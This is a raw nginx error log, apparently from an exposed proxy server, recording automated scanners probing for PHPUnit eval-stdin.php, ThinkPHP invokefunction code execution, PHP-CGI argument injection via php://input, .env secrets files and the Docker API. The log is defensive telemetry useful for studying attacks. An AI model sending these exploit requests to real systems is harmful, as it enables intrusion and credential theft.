+2026/01/30 14:21:12 [error] 230#230: *11686 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.64, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 14:21:13 [error] 230#230: *11686 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.64, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 14:21:13 [error] 230#230: *11686 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.64, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 14:21:14 [error] 230#230: *11686 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.64, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 14:21:14 [error] 230#230: *11686 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.64, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 14:21:15 [error] 230#230: *11686 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.64, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 14:21:15 [error] 230#230: *11686 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.64, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 14:21:16 [error] 230#230: *11686 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.64, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 14:21:17 [error] 230#230: *11686 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.64, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 14:21:17 [error] 230#230: *11686 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.64, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 14:21:18 [error] 230#230: *11686 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.64, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 14:21:19 [error] 230#230: *11686 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.64, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 14:21:19 [error] 230#230: *11686 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.64, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 14:21:20 [error] 230#230: *11686 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.64, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 14:21:20 [error] 230#230: *11686 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.64, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 14:21:21 [error] 230#230: *11686 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.64, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 14:21:21 [error] 230#230: *11686 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.64, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 14:21:22 [error] 230#230: *11686 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.64, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 14:21:23 [error] 230#230: *11686 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.64, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 14:21:23 [error] 230#230: *11686 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.64, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 14:21:24 [error] 230#230: *11686 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.64, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 14:21:24 [error] 230#230: *11686 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.64, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 14:21:25 [error] 230#230: *11686 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.64, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 14:21:26 [error] 230#230: *11686 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.64, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 14:21:26 [error] 230#230: *11686 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.64, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 14:21:27 [error] 230#230: *11686 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.64, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 14:21:27 [error] 230#230: *11686 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 45.78.235.64, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 14:21:28 [error] 230#230: *11686 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 45.78.235.64, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 14:21:30 [error] 230#230: *11686 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 45.78.235.64, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 14:41:31 [error] 231#231: *11691 "/var/www/html/bin/index.html" is not found (2: No such file or directory), client: 204.76.203.18, server: localhost-nginx-proxy-manager, request: "GET /bin/ HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 14:53:59 [error] 236#236: *11698 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 15:06:20 [error] 236#236: *11700 open() "/var/www/html/actuator/gateway/routes" failed (2: No such file or directory), client: 79.124.40.174, server: localhost-nginx-proxy-manager, request: "GET /actuator/gateway/routes HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 15:45:07 [error] 236#236: *11706 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 15:49:56 [error] 238#238: *13203 open() "/var/www/html/login" failed (2: No such file or directory), client: 199.45.155.107, server: localhost-nginx-proxy-manager, request: "GET /login HTTP/1.1", host: "91.82.215.191" +2026/01/30 15:55:56 [error] 239#239: *13210 open() "/var/www/html/ncsi.txt" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET http://www.msftncsi.com/ncsi.txt HTTP/1.1", host: "www.msftncsi.com", referrer: "http://91.82.215.191/" +2026/01/30 15:55:56 [error] 239#239: *13211 "/var/www/html/HNAP1/index.html" is not found (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /HNAP1/ HTTP/1.1", host: "91.82.215.191", referrer: "http://91.82.215.191/" +2026/01/30 15:55:57 [error] 239#239: *13212 open() "/var/www/html/sqlite/main.php" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /sqlite/main.php HTTP/1.1", host: "91.82.215.191", referrer: "http://91.82.215.191/" +2026/01/30 15:55:57 [error] 239#239: *13213 open() "/var/www/html/sqlitemanager/main.php" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /sqlitemanager/main.php HTTP/1.1", host: "91.82.215.191", referrer: "http://91.82.215.191/" +2026/01/30 15:55:57 [error] 239#239: *13214 open() "/var/www/html/SQLiteManager/main.php" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /SQLiteManager/main.php HTTP/1.1", host: "91.82.215.191", referrer: "http://91.82.215.191/" +2026/01/30 15:55:57 [error] 239#239: *13215 open() "/var/www/html/SQLite/main.php" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /SQLite/main.php HTTP/1.1", host: "91.82.215.191", referrer: "http://91.82.215.191/" +2026/01/30 15:55:57 [error] 236#236: *13216 open() "/var/www/html/SQlite/main.php" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /SQlite/main.php HTTP/1.1", host: "91.82.215.191", referrer: "http://91.82.215.191/" +2026/01/30 15:55:57 [error] 236#236: *13217 open() "/var/www/html/main.php" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /main.php HTTP/1.1", host: "91.82.215.191", referrer: "http://91.82.215.191/" +2026/01/30 15:55:57 [error] 236#236: *13218 open() "/var/www/html/test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/main.php" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/main.php HTTP/1.1", host: "91.82.215.191", referrer: "http://91.82.215.191/" +2026/01/30 15:55:57 [error] 236#236: *13219 open() "/var/www/html/SQLiteManager-1.2.4/main.php" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /SQLiteManager-1.2.4/main.php HTTP/1.1", host: "91.82.215.191", referrer: "http://91.82.215.191/" +2026/01/30 15:55:57 [error] 236#236: *13220 open() "/var/www/html/agSearch/SQlite/main.php" failed (2: No such file or directory), client: 109.105.8.93, server: localhost-nginx-proxy-manager, request: "GET /agSearch/SQlite/main.php HTTP/1.1", host: "91.82.215.191", referrer: "http://91.82.215.191/" +2026/01/30 16:35:33 [error] 236#236: *13247 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 17:09:20 [error] 236#236: *13251 open() "/var/www/html/_next" failed (2: No such file or directory), client: 176.65.148.66, server: localhost-nginx-proxy-manager, request: "HEAD /_next HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 17:09:22 [error] 237#237: *13253 open() "/var/www/html/_next" failed (2: No such file or directory), client: 176.65.148.66, server: localhost-nginx-proxy-manager, request: "POST /_next HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 17:28:05 [error] 237#237: *13258 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 18:28:07 [error] 238#238: *13292 open() "/var/www/html/.env.development" failed (2: No such file or directory), client: 176.65.149.17, server: localhost-nginx-proxy-manager, request: "GET /.env.development HTTP/1.1", host: "91.82.215.191" +2026/01/30 18:47:36 [error] 238#238: *13297 "/var/www/html/backup/index.html" is not found (2: No such file or directory), client: 204.76.203.18, server: localhost-nginx-proxy-manager, request: "GET /backup/ HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 18:47:40 [error] 238#238: *13298 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 91.224.92.115, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 19:09:02 [error] 238#238: *13307 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.183.209.196, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 20:00:33 [error] 239#239: *13322 "/var/www/html/cluster/cluster/index.html" is not found (2: No such file or directory), client: 54.233.41.185, server: localhost-nginx-proxy-manager, request: "GET /cluster/cluster/ HTTP/1.1", host: "91.82.215.191" +2026/01/30 20:00:35 [error] 239#239: *13324 open() "/var/www/html/script" failed (2: No such file or directory), client: 56.124.15.89, server: localhost-nginx-proxy-manager, request: "GET /script HTTP/1.1", host: "91.82.215.191" +2026/01/30 20:00:36 [error] 239#239: *13326 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 45.78.235.65, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 20:00:37 [error] 239#239: *13326 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.65, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 20:00:38 [error] 239#239: *13326 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.65, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 20:00:38 [error] 239#239: *13326 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.65, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 20:00:39 [error] 239#239: *13326 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.65, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 20:00:39 [error] 239#239: *13326 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.65, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 20:00:39 [error] 239#239: *13326 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.65, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 20:00:40 [error] 239#239: *13326 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.65, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 20:00:40 [error] 239#239: *13326 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.65, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 20:00:41 [error] 239#239: *13326 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.65, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 20:00:41 [error] 239#239: *13326 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.65, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 20:00:41 [error] 239#239: *13326 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.65, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 20:00:42 [error] 239#239: *13326 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.65, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 20:00:42 [error] 239#239: *13326 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.65, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 20:00:43 [error] 239#239: *13326 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.65, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 20:00:43 [error] 239#239: *13326 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.65, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 20:00:44 [error] 239#239: *13326 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.65, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 20:00:44 [error] 239#239: *13326 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.65, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 20:00:44 [error] 239#239: *13326 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.65, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 20:00:45 [error] 239#239: *13326 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.65, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 20:00:45 [error] 239#239: *13326 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.65, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 20:00:46 [error] 239#239: *13326 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.65, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 20:00:46 [error] 239#239: *13326 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.65, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 20:00:47 [error] 239#239: *13326 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.65, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 20:00:47 [error] 239#239: *13326 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.65, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 20:00:47 [error] 239#239: *13326 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.65, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 20:00:48 [error] 239#239: *13326 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.65, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 20:00:48 [error] 239#239: *13326 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.65, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 20:00:49 [error] 239#239: *13326 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.65, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 20:00:49 [error] 239#239: *13326 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.65, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 20:00:50 [error] 239#239: *13326 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.65, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 20:00:50 [error] 239#239: *13326 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.65, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 20:00:50 [error] 239#239: *13326 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.65, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 20:00:51 [error] 239#239: *13326 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.65, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 20:00:51 [error] 239#239: *13326 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.65, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 20:00:52 [error] 239#239: *13326 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.65, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 20:00:52 [error] 239#239: *13326 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.65, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 20:00:52 [error] 239#239: *13326 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 45.78.235.65, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 20:00:53 [error] 239#239: *13326 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 45.78.235.65, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 20:00:53 [error] 239#239: *13326 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 45.78.235.65, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.215.191:80" +2026/01/30 20:00:55 [error] 239#239: *13326 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 45.78.235.65, server: localhost-nginx-proxy-manager, request: "GET 